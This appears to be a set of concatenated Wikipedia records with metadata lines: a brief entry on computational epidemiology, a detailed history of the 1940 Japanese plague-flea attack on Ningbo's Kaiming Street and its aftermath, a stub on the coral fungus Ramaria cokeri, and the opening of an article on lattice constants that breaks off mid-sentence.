Computational epidemiology is a multidisciplinary field that uses techniques from computer science, mathematics, geographic information science and public health to better understand issues central to epidemiology such as the spread of diseases or the effectiveness of a public health intervention. Computational epidemiology traces its origins to mathematical epidemiology, but began to experience significant growth with the rise of big data and the democratization of high-performance computing through cloud computing. Introduction In contrast with traditional epidemiology, computational epidemiology looks for patterns in unstructured sources of data, such as social media. It can be thought of as the hypothesis-generating antecedent to hypothesis-testing methods such as national surveys and randomized controlled trials. A mathematical model is developed which describes the observed behavior of the viruses, based on the available data. Then simulations of the model are performed to understand the possible outcomes given the model used. These simulations produce as results projections which can then be used to make predictions or verify the facts and then be used to plan interventions and meters towards the control of the disease's spread. References External links Sax Institute - Decision Analytics Computational Epidemiology Lab Computational science Epidemiology
Computational epidemiology
Mathematics,Environmental_science
248
1,944,827
https://en.wikipedia.org/wiki/Kaimingjie%20germ%20weapon%20attack
The Kaimingjie germ weapon attack () was a secret biological warfare launched by Japan in October 1940 against the Kaiming Street area of Ningbo, Zhejiang, China. A joint operation of the Imperial Japanese Army's Unit 731 and Unit 1644, this attack was operated by military planes taking off from Jianqiao Airport in Hangzhou,which airdropped wheat, corn, cotton scraps, and sand infected with plague fleas to target locations. From September 1940, Ningbo, Quzhou, and other places were subjected to various forms of biological warfares until the end of October 1940, when the attacks triggered a plague epidemic in Ningbo. After the outbreak of the plague, the city authorities in Ningbo built a 4.3-meter-high isolation wall around the epidemic area, segregating patients and suspected cases, and eventually burned down the Kaiming Street area to eradicate the disease. Until the 1960s, this burned area was still referred to as the "plague field". According to the doctoral thesis of Junichi Kaneko, a military doctor of Unit 731, on October 27, 1940, Unit 731 spread 2 kilograms of plague bacteria over Ningbo, Zhejiang, using aircraft, resulting in a total of 1,554 deaths from the first- and second-round infections. Background Japanese biological warfare plan In June 1925, Japan signed the Geneva Protocol, which committed Japan to refrain from using biological and chemical weapons in warfare. The development of Japan's biological weapons was highly secretive and led by Shiro Ishii. He planned and raised funds for Japan's biological weapons program. In 1939, the Imperial Japanese Army established Unit 1644 in Nanjing to conduct research on biological and chemical weapons. Units 1644 and 731 studied the effects of various chemicals and pathogens that could be used as biological weapons on soldiers and civilians and developed weapons to further expand the Japanese Empire's territory in Asia. After the failure of the rapid decisive victory plan in the war against China, the Japanese military began using bacteriological weapons. In the summer of 1939, during the Battle of Khalkhin Gol, the Imperial Japanese Army used biological and chemical weapons against Soviet and Mongolian troops. On June 13, large quantities of white powder were airdropped in the vicinity of Lihai, Shaoxing. On June 15, chemical tests conducted by the local river police did not reveal any abnormalities, but subsequent bacterial culture tests revealed turbidity in one test tube and cotton-like floating substances in another, with pathogens such as tetanus and diphtheria observed under a microscope. Within days after the airdrop, the weather in Shaoxing was clear and sunny, with abundant sunlight, which was not conducive to bacterial growth, so no epidemic outbreak occurred. This is the earliest recorded instance of the Japanese military's bacteriological weapon attack in Zhejiang. Strategic location of Ningbo Before 1937, Zhejiang cities such as Ningbo, Jinhua, and Quzhou in Zhejiang did not experience a plague epidemic. However, people may have been aware of the plague near Ningbo in Shanghai in 1910. The incubation period of the plague is 2 to 8 days. At the time of the outbreak, sulfa drugs, streptomycin, and other antibiotics had not yet been invented, so residents of Ningbo could not have access to antibiotics and were primarily treated with serum. Without treatment, the mortality rate of the plague was almost 100%, and there was not enough serum supply prepared in advance. After the outbreak of the Second Sino-Japanese War in 1937, Ningbo became one of the important seaports for China to obtain international aid supplies, with a daily throughput of over 10,000 tons of goods. As a port city with a population of 260,000, Ningbo had numerous streets, dense housing, crowded residents, relatively poor sanitary conditions, high population mobility, and frequent goods entering and leaving, making it easy for the plague to spread and proliferate through people and goods transmission. Kaiming Street is a north-south urban main road in Ningbo and is the main commercial centre of the old city. Since the first Japanese air raid on Lishe Airport on August 16, 1937, the Japanese military had directly attacked Ningbo at least 7 times. On 17 July 1940, the Japanese military first invaded Zhenhai, but were driven out by the Chinese army on the 22. The Japanese military again bombed Ningbo on 5 and 10 September of the same year. Operation Decision-making In June 1940, the Imperial Japanese Army headquarters formally discussed the use of biological weapons and issued orders to begin biological warfare. On 5 June 1940, discussions on the implementation of bacteriological warfare were held by Colonel Kozo Aramaki from the Operations Department of the Imperial Japanese Army General Staff, Major Kumaomi Imoto from the China Expeditionary Army Staff, and Lieutenant Colonel Tomosada Masuda, acting commander of Unit 1644 in Nanjing. It was decided during the discussions that the main cities in Zhejiang would be targeted, and the method of operation would involve dispersing bacterial liquids from aircraft and air-dropping fleas infected with plague. On August 6, a heavily guarded train departed from the barracks of Unit 731 in Pingfang, bound for Hangzhou. The train was loaded with 700 aerial bombs, 20 vehicles, 70 kilograms of Salmonella typhi, 50 kilograms of Vibrio cholerae, and 5 kilograms of plague fleas. Shiro Ishii was the overall director of this operation. On September 10, 1940, negotiations were held in Hangzhou between the Central China Expeditionary Army and the Nara Unit, responsible for bacteriological warfare and composed of personnel from Unit 731 and Unit 1644, to select the targets for the attacks: Ningbo and Quzhou, with Jinhua as a backup, to coincide with the blockade of Ningbo Port by the Imperial Japanese Navy since July 1940. The Japanese army also referred to this operation as the "Operation Hangzhou.". According to the plan, aircraft would take off from Hangzhou Jianqiao Airport and drop ceramic bacteriological bombs developed by Shiro Ishii himself, along with cotton, shredded cloth, and other materials to protect the fleas. Corn and cloth were infested with fleas carrying pathogens of cholera and plague to infect rats, which would then transmit the diseases to human hosts. Air raids During the three-month-long bacteriological warfare, six areas including Ningbo were subjected to various forms of bacteriological attacks. In Quzhou, the Japanese employed aircraft to scatter grain and wheat seeds carrying bacteria; in Ningbo, aircraft were used to spread bacterium-laden grains and cotton within or around the city; in Jinhua, explosions from bombs dropped by aircraft produced a pale yellow smoke; in Yushan, a plan was implemented to release bacteria among ordinary residents, with pathogens being introduced into residents' water pools, wells, and even placed hundreds of seemingly abandoned desserts and fruits injected with large quantities of typhoid and paratyphoid bacteria by the Imperial Japanese Army at doorsteps and treesides, deceiving local residents who lacked food to consume. On 4 October 1940, wheat and barley items dropped by Japanese aircraft were found in Quzhou. That afternoon, the county magistrate ordered the residents of Quzhou to gather and burn the air-dropped items. Starting from 10 October, the area began to see deaths from the diseases. From 18 September to 8 October, the Japanese launched a total of six attacks on Ningbo, none of which resulted in a plague outbreak. Despite fleas being dropped in Quzhou on 4 October, there were no apparent effects by the end of October.On 22 October, Japanese military aircraft flew over Ningbo and dropped wheat and other items. The airstrikes in Quzhou did not attract the attention of the provincial government, which instead focused on a plague outbreak in Qiyuan, not associated with the Imperial Japanese Army. At around 7 a.m. on 27 October, air raid sirens sounded in downtown Ningbo, and Japanese military aircraft flew over the streets of the city, dropping leaflets instead of bombs. According to eyewitness Hu Xianzhong, the leaflets depicted flags of Japan, Germany, and Italy, and a cartoon depicting "Sino-Japanese friendship," claiming that Chongqing was suffering from famine and hardship while the Japanese people were well-fed and had surplus food to help them. Around 2 p.m., Japanese aircraft reappeared and air-dropped barley, millet, flour, and clusters of cotton balls. Archibald Crouch, an American missionary in Ningbo, noted in his diary that while Japanese aircraft usually flew in groups when arriving in Ningbo, this time there was only one aircraft, which was unusual, and observed that after the aircraft passed, it seemed to release a cloud that dispersed downward. Local residents had no experience of a plague outbreak, and no one mentioned that this was a biological weapons attack that day. Epidemic Early spread In 1940, Ningbo had yet to have piped water, so it was common for households to collect rainwater in one or two large jars placed under the eaves of their courtyards for drinking and cooking. On the evening of 27 October, heavy rain in Ningbo washed wheat grains from rooftops into these water jars. Some poultry that consumed the wheat grains died the following day. People noticed a sudden increase in fleas in Donghou Street and Kaiming Street, but there were no reports of deaths among rodents. Rumours circulated that the Japanese air raid was actually a biological weapons attack. On 30 October, according to the local Chinese-language newspaper Shishi Gongbao, an acute disease outbreak was reported in Kaiming Street of Ningbo, spreading severely. Within just three days, over 10 deaths were reported. Subsequently, people from neighbouring establishments such as Wang Shunxing's bakery, Hu Yuanxing's dominoes shop, Yuan Tai Hotel, Bao Changxiang underwear shop on East Zhongshan Road, and the vicinity of Donghou Street, all experienced fatalities. Infected individuals exhibited symptoms including high fever, headache, dizziness, staggering gait, sometimes confusion, swelling and pain in the lymph nodes, and diarrhoea before death. Initially, people mistook it for bubos or malignant malaria. People sought quinine from hospitals, but it proved ineffective. On the morning of 1 November, nearly ten households in Kaiming Street, East Main Road, Donghou Street, and Taiping Alley reported deaths, with an increasing number suffering from colds and fever. Nine people succumbed to the disease on that day alone. Immediate responses On 1 November, the government of Yin County invited physicians to form a prevention and control committee, with Zhang Fangqing, the director of the Central Hospital, appointed as the head of the Medical Affairs Department, and Sun Jinshi as the attending physician. Based on Sun Jinshi's preliminary diagnosis of patient symptoms, they suspected plague, with the majority of patients suffering from septicemic plague, and a minority from bubonic plague, with no cases of pneumonic plague detected. Ding Licheng, the director of Hwa Mei Hospital, stated that it was still uncertain whether it was a genuine plague. On the evening of 2 November, the county government imposed a blockade and isolation on the area and conducted routine disinfection of households. As a preventive measure, bed sheets and cloth were burned, and officials promptly began vaccinations. Wang Shunxing's bakery, Hu Yuanxing's dominoes shop, Yuan Tai Hotel, Bao Changxiang underwear shop on East Zhongshan Road, and the vicinity of Donghou Street, all experienced fatalities. By November 3, 16 deaths had occurred, followed by another 7 on the next day. The highest recorded death toll in a single day was 20. Wails echoed along Kaiming Street, with mourners clad in mourning attire abound. Ding Licheng, the director of Hua Mei Hospital, obtained samples through lymph node puncture fluid examination, and had the plague bacillus detected by Hua Mei's examiner Xu Guofang, followed by multiple tests and rechecks by the provincial health department. On 4 November, Ding Licheng issued a statement to the Shishi Gongbao, officially declaring the epidemic as "plague." Quarantine From 4 November onwards, an isolation zone spanning over 5000 square metres around the affected area was demarcated. Considering the inconvenience of transporting patients to Dayuwangmiao, due to its distance from the outbreak site, a Class A Isolation Hospital was established in Tongshun Store within the isolation zone to admit patients exhibiting clear symptoms. Additionally, a Class B Isolation Hospital was established at Kaiming Lecture Hall on Kaiming Street adjacent to the outbreak area to accommodate individuals suspected of being infected. On 5 November, the local newspaper Shishi Gongbao issued an official announcement titled Great Disaster: All Citizens Unite to Eradicate the Plague, along with the publication of the first epidemic prevention special edition. Subsequently, daily updates on epidemic prevention measures continued to be featured. The county secretary, Zhang Hongbin, assumed temporary control of the county government, and on 6 November, the Yin County Epidemic Prevention Office was established, concurrently forming a team to search for fugitive patients. Township governments under the county also issued a notice refusing to accommodate residents from the affected area. Schools, public places, hotels, and restaurants ceased operations one after another. From that day onwards, families were prohibited from burying bodies privately, and all deceased patients were required to be buried deep in Laolongwan in the southwest suburbs. Starting on 7 November, three quarantine hospitals—designated as Class A, Class B, and Class C—were established. Class A was tasked with treating confirmed plague patients, while Part B oversaw asymptomatic residents under observation within the affected area. Part C dealt with suspected patients both inside and outside the epidemic area. The Class A and Class C hospitals were located at Tongshun Store and Kaiming Hermitage. The Class B hospital was within the Yongyao Power Building. Residents' clothing, miscellaneous items, and furniture were disinfected and transported by stretcher teams. To address the issue of handling materials within the epidemic area, a property registration office was established to register all houses and items within the epidemic area. For valuable or movable items, disinfection was mandatory before removal from the epidemic area. Two large stoves were constructed on the open ground of Kaiming Lane in the southwest corner of the epidemic area for boiling and disinfection purposes. Disinfection personnel wore protective clothing and hats, and based on the household information in the registration book, items were removed for disinfection house by house, with family members responsible for collection. On 8 November, the Yin County government held its second epidemic prevention meeting, mandating that residents within the epidemic area and other relevant individuals must receive preventive injections of the plague vaccine. To facilitate this, the county government established a dedicated vaccination team, covering an area from the epidemic area centred around Kaiming Street, extending east to Qizha Street, south to Daliang Street, west to the North and South Main Roads, and north to Cangshui Street in the city centre. All residents, including primary and secondary school students, were required to receive the vaccination. On 10 November, Chen Wanli, Director of the Zhejiang Provincial Health Bureau, led the 17th Epidemic Prevention Team of the National Health Administration to Ningbo with the vaccines. In total, 23,343 individuals received the injections. From 8 November onwards, a wall measuring over one yard high was erected around the perimeter of the epidemic area. The wall's surface was plastered with mud and covered with arched white iron sheets on the top. Additionally, a three-foot wide and four-foot deep isolation trench was dug outside the wall to prevent the spread of the epidemic, ensuring that plague-infested fleas could not escape. To prevent the spread of the disease, the disinfection team implemented a series of measures. They primarily sealed the cracks along the street walls with white paper and sprayed lime water along the way. Shops and houses were sealed and subjected to 12 hours of sulphur fumigation for disinfection. Furthermore, ceilings and floors were pried open and filled with lime water to thoroughly remove the bodies of dead rats. Additionally, all domestic animals such as dogs and cats within the epidemic area were culled. On 14 November, the search team for escaped patients successfully apprehended 14 individuals.Subsequently, a total of 38 residents who had fled the epidemic area were gradually recovered. Shockingly, the number of deaths among those who escaped the area reached as high as 32 individuals. From 15 November onwards, concerns about personal safety were openly expressed by those responsible for sealing off and isolating the area. Since 23 November, there had been public complaints and protests against the isolation measures. Local media also began questioning the authenticity of the epidemic, with those raising doubts and objections being officially rebutted and condemned. However, there were few who questioned the isolation measures themselves, indicating community understanding of the corresponding risks and support for such actions. Burning The epidemic area comprised over 200 houses, mostly of brick and wood construction. Along East Main Road and Kaiming Street, the street-facing houses typically had three or pseudo-three floors, while those within the alleys were mostly two or single-storey buildings. To thoroughly eradicate the source of the epidemic, experts concluded that the area was relatively concentrated and situated in a bustling urban district. Additionally, beneath these houses, there used to be a small river that was purchased and filled in by homeowners during the expansion of East Main Road. However, in some areas, remnants of the river remained, filled with debris, making it challenging to disinfect using conventional methods. At the 19th anti-epidemic meeting held on 28 November, due to the poor condition of the houses in the epidemic area and its low-lying location, which made it an ideal breeding ground for rats and fleas, the county government decided to burn down the epidemic area. The burning operation commenced at 7 p.m. on 30 November and was overseen by officials from the Provincial Health Department and local residents of Ningbo. Prior to the burning, nearby streets were closed to traffic, and surrounding buildings were protected by the fire brigade. Except for valuable items that could be disinfected and removed, all other belongings within the epidemic area were incinerated. Provincial Health Department Director Chen Wanli inspected the area and approved the decision. On 30 November 1940, the authorities of Yin County carried out their plan to burn down all the houses in the epidemic area. Several points were selected within the epidemic area as ignition points, where straw was laid down, soaked with petrol, and designated routes were established for the fire setters. The perimeter was tightly guarded by military and police forces, and the entire city's fire brigade was mobilized to protect the safety of buildings outside the epidemic area. At around six or seven in the evening, fires were simultaneously ignited at 11 locations within the epidemic area, and flames shot up into the sky, lasting for a full four hours. All the residences, shops, and factories within the epidemic area were engulfed by the blaze. A total of 115 households, comprising 137 houses, and 5000 square meters of buildings were reduced to rubble overnight. The fire spread to the houses across East Avenue, blackening their outer walls and sending sparks flying. The fire brigade then aimed their hoses at these row houses and activated the water pumps. In North Taiping Lane, where the road was narrow, houses were specifically protected by sprinkler heads. The specific areas burned included 224 to 268 East Zhongshan Road, Jiang Zhongji to Jiuhe Xiang Smoke Shop, 64 to 98 Kaiming Street, 139, 133, 129, 128, 127, 126, 125, 124, 123, 122, 121, 120, 118, 130 (Tongshun Store), 131, 134, 136 (Wang Renlin), 138, 132, 140, 141 (Xu Shenglai), 142, and 143 Donghou Street. Additionally, there were 8 upstairs houses, 5 front and back small coverings, and 3 high-level flat-roofed houses in the Kaiming Street temple, and 28 third-floor market houses and 3 second-floor market houses in Taiping Lane. Until the 1960s, this burned area was still referred to as the "plague field." After the Imperial Japanese Army entered Ningbo in 1941, they demolished the isolation walls. Investigations Nationalist government Theory of local origins In October to November 1940, Chen Wanli from the Zhejiang Provincial Health Department and others involved in the prevention and control of the plague in Zhejiang, such as Liu Jingbang, did not believe that the plague in Ningbo at that time was caused by Japanese biological weapons. On 5 November, the Shishi Gongbao published an article titled "Investigating the Origin of the Disease," which rejected the speculation of Japanese biological weapons and put forward the "local origin" theory. The article pointed out that a similar plague event occurred in the Donghou Street area of Kaiming Street, which was initially suspected to be caused by enemy aircraft spreading poison. However, based on factual inference, several factors may have contributed to the outbreak: the Donghou Street area used to have a city moat, which was filled with garbage when the riverbed was filled. In the garbage pile, dead rats were inevitably mixed in. Due to the long decomposition of dead rats or the breeding of toxins in the garbage, once they entered the human body, it would trigger a plague-like outbreak. From this report, it can be inferred that the source of the plague in Ningbo this time was similar to the Qingyuan plague in 1938, both originating locally due to "rotting dead rats" or "garbage brewing toxins" leading to the occurrence of the plague. Theory of biological warfare On 28 November 1940, the Japanese bombed Jinhua, scattering granular particles resembling fish eggs, which were confirmed to contain Yersinia pestis. On 5 December, Huang Shaohong, the Chairman of the Zhejiang Provincial Government, telegraphed all county magistrates, instructing them to immediately report any outbreaks and establish epidemic prevention committees to promptly seal off affected areas and isolate patients. He also reported the finding to Chiang Kai-shek via telegram, asserting that his province was under the attack of Japanese biological weapons. On 29 November 1940, the Shishi Gongbao reported that Japanese aircraft attacked Jinhua on 28 November 28, and in addition to releasing poison gas, also dispersed Gram-negative bacilli, attempting to attack civilians. By December 3, the Shishi Gongbao suggested that the source of the plague in Ningbo was "enemy aircraft spreading poison," but stopped short of making a definitive statement, only stating that "the enemy's intentions are sinister, and poisoning is possible." However, Ningbo health officials remained divided on whether the epidemic in Ningbo originated from Japanese biological weapons. On 10 December 1940, Chen Wanli reported to the Nationalist Government, stating, "About a week before the onset of the illness, enemy aircraft dropped about 2 liters of wheat over the epidemic area. Whether this is related to the epidemic is yet to be determined." By mid-December, Chen Wanli, Liu Jingbang, and Ke Zhuguang confirmed that the plague in Qu County and Jinhua was the result of "enemy aircraft spreading poison." Huang Shaoheng, Chairman of the Zhejiang Provincial Government, pointed out in his report to the Nationalist Government that there was a strong correlation between the Ningbo plague and the suspected Japanese aircraft dissemination, citing evidence of Japanese aircraft dispersing plague bacilli in Jinhua, which could prove Japan's use of bacteriological warfare. While Zhejiang's provincial government introduced a law to manage airdrops from Japanese aircraft, Chen Wanli and other Zhejiang health officials were disbelieved by the experts of National Health Administration, including Robert Pollitzer. Further investigations In December 1940, the National Health Administration convened a national health technology conference in Chongqing to discuss the plague in Ningbo. During the meeting, Chen Wengui, a microbiologist, who attended the meeting, pointed out that the Japanese had conducted bacteriological warfare in China, but he was accused of being overly sensitive by the conference chairman. During the Zhejiang Plague Consultation Conference chaired by Jin Baoshan, Robert Pollitzer expressed skepticism about the theory of bacteriological warfare causing the plague. The Nationalist Government received accusations stating that the epidemic was not the plague and that burning down houses was unnecessary. In January 1941, Jin Baoshan dispatched the Director of the Epidemic Prevention Department, Rong Qirong, and others to investigate in Zhejiang. Before arriving in Ningbo, Pollitzer had already confirmed the situation of blood smears at the provincial health department and verified the conditions of the disease and its onset. The investigation proposed two theories: one was that the epidemic originated from elsewhere and spread to Ningbo, as there had been a plague outbreak in Qingyuan, southern Zhejiang; the other was that Japanese aircraft had spread fleas and other substances by dropping wheat and grains. However, the transport from Qingyuan to Ningbo was extremely inconvenient, and no outbreaks occurred along the way. The areas where Japanese aircraft dropped the most wheat and grains also had the highest death tolls. Additionally, strange fleas were found in the epidemic area, slightly smaller in size and red in color, distinct from local fleas. After the investigation, Rong Qirong supported Pollitzer's judgment, believing there was not enough scientific evidence for biological warfare. On 5 March 1941, Chen Wanli, the highest health official of Zhejiang, informed Yu Jimin, the Magistrate of Yin County, requesting the submission of post-growing photographs of airdropped wheat as evidence, to be forwarded to Chongqing for verification. He also mentioned that detailed records of plague cases from the previous year and investigations related to patient onset needed to be provided urgently in response to central government requests. Chen Wanli further instructed Zhang, the director of the Yin County Health Bureau, to submit detailed records of plague cases from the previous year and to send a copy of the plague patient investigation form. He emphasized that all documents needed to be submitted within ten days for transmission to the central authorities, including information on the isolation status of all patients and the entire period of quarantine work. On 4 November 1941, using the same method, the Japanese attacked Changde, resulting in 2810 being infected with the plague. Immediately after the attack, Chen Wengui led a team to investigate. He performed autopsies on the bodies and injected lymph node puncture blood from patients into guinea pigs, which died five days later. By observing patient samples and conducting pathological analysis, it was concluded that the patients died from sepsis caused by Yersinia pestis. Chen Wengui compiled the evidence gathered into the "Investigation Report on the Plague in Changde, Hunan," confirming Japanese bacteriological warfare. However, the Nationalist government, considering the matter's impact on international credibility, altered the report. It was not until 1950 that the report resurfaced from the archives. Imperial Japanese Army Indirect sources The Japanese military monitored the local media reports and regularly dispatched military aircraft to surveil the situation. The air raids resulted in a plague outbreak, leading to the success of bacteriological warfare attacks by rapidly disseminating a certain bacterial vector through aircraft. This development pleased Shiro Ishii. Ishii concluded that for successful attacks, bacteria should not be dispersed from high altitudes; instead, fleas and pathogens should be released together. Additionally, Shiro Ishii specifically filmed the Ningbo plague as a documentary to publicise his achievements. On 25 November 1940, the Imperial Japanese Army instructed to terminate the experiments, with all participants instructed to return to their original units and maintain secrecy. By the end of 1940, the Emperor ordered the expansion of Unit 731, increasing its personnel to 3,000 and establishing the Hailar Detachment, Sunwu Detachment, Hailin Detachment, and Linkou Detachment. Starting from 1940, an annual budget of 10 million yen was allocated to Unit 731. Shiro Ishii, the commander of Unit 731, was promoted to Major General on 1 March 1941. Field study In April 1941, following the Japanese occupation of Ningbo, a further investigation into the effectiveness of the plague attack in Ningbo was launched. The Kwantung Army transferred five researchers from Unit 731 to Nanjing to collaborate with Unit 1644 in investigating the effectiveness of the plague attack in Ningbo. In early May, eleven senior Japanese generals visited the vicinity of the epidemic area to meet with Jin Tirong, who was responsible for epidemic prevention work in 1940. They extensively queried the occurrence of the plague in Ningbo, including when and where it first occurred, which household was initially affected, whether there was aircraft dispersal of wheat, and whether there were accusations from the local population against the Japanese military, among other details. This questioning lasted for about two hours, and the contents were meticulously recorded. Kaneko thesis According to the doctoral thesis of Junichi Kaneko, a military doctor of Unit 731, on 27 October 1940, Unit 731 scattered 2 kilograms of plague bacteria over Ningbo, Zhejiang Province, using aircraft. According to the data shown in the thesis's charts, the plague began to spread in Ningbo on 30 October, with 3 cases reported on the 31st, increasing to 9 cases on 1 November, peaking at 13 cases on the 6th, 10 cases on the 8th, 8 cases on the 9th, and 7 cases on the 12, gradually declining thereafter until the last case on 7 December, lasting a total of 39 days with 112 reported cases. Patients who escaped from the epidemic area created conditions for a "second infection." According to research conducted by the Japanese military in Ningbo, it was found that 1450 people died in the second round of infections. On 15 October 2011, representatives of the Tokyo-based citizen organization "Revealing the Truth of Unit 731's Bacterial Warfare" and five others, including Professor Matsamura Takao from Keio University and Wang Xuan, a descendant of victims of bacterial warfare in China, held a press conference in Tokyo. They urged the Japanese government to disclose information on bacterial warfare and face up to historical truths. The organization discovered the first part of a classified military report from the Army Medical School's Epidemic Research Institute, titled "Estimation of PX's Effectiveness," at the Kansai Branch of the National Diet Library in Kyoto. This report directly documented Japan's conduct of bacterial warfare in China, challenging the Japanese government's claim of "no evidence" in response to Chinese accusations of Unit 731's bacterial warfare. The cover of the report bears the words "Military Secret" and contains the name of a senior military doctor who graduated from Teikyo University and recorded the content on December 14, 1943. The report explains that "PX" refers to fleas infected with Yersinia pestis, and it calculates the effectiveness of spreading bacteria bombs on the battlefield. The report lists the quantities of PX used and the number of infected individuals in various locations in China, including Nong'an, Quzhou, Ningbo, Changde, Guangxin, Guangfeng and Yushan. It states that over 26,000 people were infected once or twice, defining PX as "the best bacterial bomb, capable of causing psychological and economic panic." Trials Khabarovsk, Soviet Union On 25 December 1949, the Soviet Union began the trial of Japanese prisoners of war involved in bacteriological warfare in Khabarovsk. During the Khabarovsk trial, Japanese prisoners admitted to the events of the "aerial dissemination of pathogens" that took place in Ningbo in 1940. Susumu Hatano testified that the experiment in Ningbo was the first actual field test and, because it was conducted on enemy territory, the results were inconclusive. However, the Japanese military drew conclusions about the bacteriological warfare experiment based on information recorded in Ningbo newspapers and laboratory test data. On 29 December 1949, a forensic medical examination committee composed of six medical biologists, including academician Zhukov-Verezhnikov, from the Soviet Academy of Medical Sciences, studied all the materials related to the criminal case against Japanese prisoners charged with preparing and using bacteriological weapons. The committee confirmed that the experiments and production conducted by the Japanese Kwantung Army's Unit 731, Unit 100, and Unit 1644 of the Japanese Expeditionary Forces in China were aimed at exploring and manufacturing bacteriological weapons, as well as researching methods for their use. The committee also confirmed that in 1940, under the leadership of Shiro Ishii, a combat expedition equipped with large quantities of bacillus anthracis, vibrio cholerae, and plague-infected fleas was sent to Ningbo. The aerial dissemination of plague-infected fleas by aircraft resulted in a plague epidemic in the Ningbo area. After news of the Khabarovsk trial reached China, the Zhejiang Daily published a news article on 7 February 1950, stating that personnel from the Zhejiang Provincial Health Department, including Wang Yuzhen, Zheng Jie'an, Yu Hanjie, and Jin Qiu, submitted a written report in support of the Soviet Union's trial of Japanese bacteriological warfare criminals. The report criticized the Zhejiang Health Department at the time for not taking action when the Japanese military continuously disseminated plague bacteria in various areas of Zhejiang, instead covering up for the Imperial Japanese Army. Tokyo, Japan After the war, the activities of Unit 731 remained confidential and did not appear in the Tokyo Trials. It wasn't until the publication of The Devil's Gluttony in 1981 that the unit's activities were first revealed to the public. In the first half of the 20th century, including during World War II, dozens of lawsuits for wartime compensation were filed against the Japanese government and companies associated with Japanese aggression. However, almost all of these lawsuits were rejected by Japanese courts. Nevertheless, the Japanese government has never formally acknowledged that the Japanese military conducted bacteriological warfare. In 1996, a group of Japanese anti-war activists came to China to investigate the victims of bacteriological warfare and expressed their willingness to help the victims sue the Japanese government for its crimes. Subsequently, in 1997 and 1999, a total of 180 plaintiffs from Zhejiang (Quzhou, Ningbo, Jiangshan, Yiwu), and Hunan (Changde) filed lawsuits against Japan, demanding that the Japanese government acknowledge its crimes of bacteriological warfare in China and apologise and compensate the victims. During the five-year trial, veterans of Unit 731 admitted to participating in live dissections, cultivating agents such as anthrax, typhoid, and cholera, and releasing plague-infected fleas into villages. Plaintiffs from China flew to Japan to testify, describing how Japanese planes flew low and dropped infected wheat, rice, or cotton, leading to mysterious disease outbreaks in villages. Despite a series of confessions from former soldiers, the Japanese government acknowledged the unit's existence but still refused to disclose the scope of scientists' activities. During the debates in the Tokyo District Court, Chinese bacteriologist Huang Ketai pointed out that unlike previous epidemics, the Ningbo plague in 1940 occurred in winter rather than summer and was carried by fleas that were not native to the region, killing humans without affecting mice. In 2002, based on 28 hearings and a large amount of evidence, the Tokyo District Court wrote a written summary confirming for the first time that the Japanese military conducted bacteriological warfare. However, many plaintiffs were angry at the rejection of their compensation claims and appealed. In 2005, the Tokyo High Court upheld the ruling of the Tokyo District Court in 2002 and rejected the request for an apology from the Japanese government for its biological warfare in China before and during World War II. The Japanese Supreme Court subsequently rejected the appeal, stating that international law prohibits foreign citizens from directly seeking compensation from the Japanese government. Memorials On 3 September 1995, the Ningbo Municipal People's Government erected a monument on the pedestrian walkway of Kaiming Street, inscribed with the words "Site of the Plague Field in Ningbo Infected by the Bacteriological Warfare of the Japanese Invaders," with the central inscription reading "Never Forget National Humiliation, Strive to Strengthen the Nation." It was signed by "Various sectors of Ningbo City on the 50th anniversary of the victory of the War of Resistance Against the Japanese." In 2005, the monument was relocated to the original site of the bacteriological epidemic area on the west side of Tianyi Haoting. The new monument's front is engraved with the words "Do Not Forget National Humiliation, Strive to Strengthen the Nation," with bacteriological warfare historical materials and a list of victims carved on both sides. In 2009, the Publicity Department of Haishu District Committee, the District Radio, Television, and News Bureau, the District Cultural Relics Management Office, and the Ningbo New Fourth Army Historical Research Association jointly established the "Ningbo Kaiming Street Plague Disaster Exhibition Hall" on the second floor of the Tianyi Business Circle Party and Mass Service Center. The curved wall on the right side of the entrance of the exhibition hall lists the names of all the victims. In the centre of the hall, there is a sand table displaying a model of the buildings in the Kaiming Street epidemic area, reconstructed according to the "Epidemic Area Map" provided by the family of the victim Hu Dingyang. References Further reading Japanese war crimes in China 1940 in Japan 1940 in China Biological warfare Japanese biological weapons program Second Sino-Japanese War crimes Military history of Ningbo
Kaimingjie germ weapon attack
Biology
7,863
38,393,517
https://en.wikipedia.org/wiki/Ramaria%20cokeri
Ramaria cokeri is a coral mushroom in the family Gomphaceae. It was described in 1976 from the Appalachian Mountains in the United States. Some authors have proposed to place the species in a separate genus Phaeoclavulina based on molecular analyses, but this was explicitly rejected in a subsequent publication due to the resulting morphological variability of the resulting genus. The species has been reported from Japan, Mexico, Colombia, Malaysia, Indonesia, Sri Lanka, Pakistan, Papua New Guinea, Solomon Islands, and New Zealand. In 2012, it was reported for the first time from the Canary Islands and Guinea. References Gomphaceae Fungi described in 1976 Fungi of Africa Fungi of Asia Fungi of New Zealand Fungi of North America Taxa named by Ron Petersen Fungi of Macaronesia Fungus species
Ramaria cokeri
Biology
159
3,263,791
https://en.wikipedia.org/wiki/Lattice%20constant
A lattice constant or lattice parameter is one of the physical dimensions and angles that determine the geometry of the unit cells in a crystal lattice, and is proportional to the distance between atoms in the crystal. A simple cubic crystal has only one lattice constant, the distance between atoms, but in general lattices in three dimensions have six lattice constants: the lengths a, b, and c of the three cell edges meeting at a vertex, and the angles α, β, and γ between those edges. The crystal lattice parameters a, b, and c have the dimension of length. The three numbers represent the size of the unit cell, that is, the distance from a given atom to an identical atom in the same position and orientation in a neighboring cell (except for very simple crystal structures, this will not necessarily be distance to the nearest neighbor). Their SI unit is the meter, and they are traditionally specified in angstroms (Å); an angstrom being 0.1 nanometer (nm), or 100 picometres (pm). Typical values start at a few angstroms. The angles α, β, and γ are usually specified in degrees. Introduction A chemical substance in the solid state may form crystals in which the atoms, molecules, or ions are arranged in space according to one of a small finite number of possible crystal systems (lattice types), each with fairly well defined set of lattice parameters that are characteristic of the substance. These parameters typically depend on the temperature, pressure (or, more generally, the local state of mechanical stress within the crystal), electric and magnetic fields, and its isotopic composition. The lattice is usually distorted near impurities, crystal defects, and the crystal's surface. Parameter values quoted in manuals should specify those environment variables, and are usually averages affected by measurement errors. Depending on the crystal system, some or all of the lengths may be equal, and some of the angles may have fixed values. In those systems, only some of the six parameters need to be specified. For example, in the cubic system, all of the lengths are equal and all the angles are 90°, so only the a length needs to be given. This is the case of diamond, which has at 300 K. Similarly, in hexagonal system, the a and b constants are equal, and the angles are 60°, 90°, and 90°, so the geometry is determined by the a and c constants alone. The lattice parameters of a crystalline substance can be determined using techniques such as X-ray diffraction or with an atomic force microscope. They can be used as a natural length standard of nanometer range. In the epitaxial growth of a crystal layer over a substrate of different composition, the lattice parameters must be matched in 